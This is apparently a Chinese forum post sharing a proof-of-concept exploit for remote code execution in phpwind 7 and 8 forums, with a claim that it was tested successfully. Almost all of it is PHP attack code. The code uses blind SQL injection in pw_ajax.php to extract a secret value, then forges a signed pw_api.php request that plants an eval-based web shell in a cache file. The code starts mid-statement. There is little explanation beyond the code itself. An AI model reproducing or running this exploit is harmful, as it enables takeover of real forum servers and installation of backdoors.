phpwind远程代码执行漏洞

经鄙人测试,完全成功！

简要描述：
phpwind较高版本论坛中存在一个严重的漏洞，成功利用该漏洞可以远程执行任意php代码，影响phpwind 7和phpwind 8

Poc:
[code]
')) {

die('用户密码或者其他参数错误');

}

$shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";

$hash="0123456789abcdef";

$craked="";

for($i=0;$i<32;$i++){ for($n=0;$n<16;$n++){ $tmp=str_replace("{offset}",bin2hex($craked.$hash[$n]),$shellcode); $tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0); if(strpos($tmp,"pw_config")){ echo "CrackEd Offset ".($i+1)." :".$hash[$n]."\r\n"; $craked=$craked.$hash[$n]; break; } } } echo "Craked Magicdata :".$craked."\r\n"; echo "Get shell :"; //another 0day $arg=''; $hack = array(); $hack['mode'] = 'Other'; $hack['method'] = 'threadscateGory'; $hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}'; $hack['type'] = 'app'; $hack = strips($hack); ksort($hack); reset($hack); foreach ($hack as $key => $value) {

if ($value && $key != 'sig') {

$arg .= "$key=$value&";

}

}

$arg.='sig='.md5($arg.$craked);

echo file_get_contents("$pwurl/pw_api.php?".$arg);

echo "OK\r\n";

$str=file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");

if(strpos($str,'wooyun')){

echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=phpinfo();";

echo "\r\nOver!";

}

function strips($param) {

if (is_array($param)) {

foreach ($param as $key => $value) {

$param[$key] = strips($value);

}

} else {

$param = stripslashes($param);

}

return $param;

}

function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){

global $cookie;

$ch = curl_init();

$timeout = 0; // set to zero for no timeout

curl_setopt ($ch, CURLOPT_URL, $url);

curl_setopt ($ch, CURLOPT_POST, $method);

curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

curl_setopt ($ch, CURLOPT_COOKIE, $cookie);

if($data){

curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);

}

curl_setopt ($ch, CURLOPT_HEADER, $header);

if($ssl){

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

}

$handles = curl_exec($ch);

curl_close($ch);

//echo $handles;

return $handles;

}
[/code]